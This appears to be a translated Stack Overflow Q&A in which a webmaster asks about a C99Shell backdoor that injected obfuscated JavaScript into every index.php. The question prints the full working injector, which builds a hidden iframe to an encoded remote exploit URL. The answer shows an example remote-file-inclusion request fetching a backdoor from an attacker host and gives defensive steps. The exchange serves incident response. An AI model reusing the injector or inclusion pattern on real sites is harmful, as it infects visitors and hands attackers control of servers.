php - 保护网站免受 Backdoor/PHP.C99Shell aka Trojan.Script.224490 的侵害

Question

我的网站被木马脚本感染了。

有人设法创建/上传了一个名为“x76x09.php”或“config.php”的文件到我的网站空间的根目录中。它的大小是 44287 字节，它的 MD5 校验和是 8dd76fc074b717fccfa30b86956992f8。 I've analyzed this file using Virustotal .这些结果表明它是“Backdoor/PHP.C99Shell”或“Trojan.Script.224490”。

这个文件在创建的那一刻就被执行了。所以它一定是自动发生的。该文件将以下恶意代码添加到我网站空间中每个 index.php 的末尾。

</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>

在我的页面上显示该代码后，用户报告说在 Firefox 中弹出了一个蓝色面板。它要求他们安装一个插件。现在他们中的一些人的 PC 上有 Exploit.Java.CVE-2010-0886.a。

尽管我关闭了 allow_url_fopen 和 allow_url_include，但还是发生了感染。我的托管商说文件不是通过 FTP 上传的。

所以我的问题是:

• 恶意代码有什么作用？它是如何编码的？
• 远程文件(“x76x09.php”或“config.php”)如何进入我的网站空间？ SQL 注入(inject)？我自己的 PC 上有病毒？
• 如何保护我的网站在未来免受此类攻击？

非常感谢您!我真的需要帮助。

This question is similar. But it's more like a report. I didn't know it's a virus from the beginning. So this question here refers to the virus itself, the other question does not.

Answer 1

我们看到的许多遭到黑客攻击的网站都是由用于将文件通过 FTP 传输到受感染网站的 PC 上的病毒造成的。该病毒以多种方式窃取 FTP 密码 - 但主要有两种。

首先，如果您使用的是 FileZilla 这样的免费 FTP 程序，您应该知道这些程序将其保存的登录凭据存储在纯文本文件中。病毒很容易找到这些文件，读取它们并将信息发送到服务器，然后服务器使用有效凭据登录 FTP，将某些文件复制到自身，感染它们，然后将它们发送回网站。通常它还会将这些“后门”shell 脚本复制到网站，以便在更改 FTP 密码时，它们仍然可以重新感染网站。

该病毒还会“嗅探”FTP 流量。由于 FTP 以明文形式传输包括用户名和密码在内的所有数据，因此病毒也很容易以这种方式查看和窃取信息。

然而，当我们看到导致感染的后门时，通常是网站某处的远程文件包含漏洞造成的。黑客不断尝试在任何请求字符串的末尾添加指向其后门程序之一的 URL。因此，在您的访问日志中，您可能会看到如下内容:

/路径/文件夹/另一个/文件夹/file.php？ http://www.hackerswebsite.com/id.txt ????

此处路径/文件夹字符串仅用于演示目的。

有时该命令有效，他们能够将 id.txt 复制到预期的网站，从而拥有一个后门 shell 脚本，他们可以从中操纵文件。

更改所有密码 - FTP、数据库、cPanel 或其他管理界面。

对所有 PC 进行病毒扫描。

更改为 SFTP。

检查所有文件夹的 755 权限和所有文件的 644。这是标准的。

如果是 SQL 注入(inject)，感染就不会出现在文件末尾。它会在某个地方有一个 SQL 调用来生成内容。

是的。使用今天的后门，攻击者可以并且可能已经查看了保存 MySQL 数据的 config.php 文件。

更改所有密码。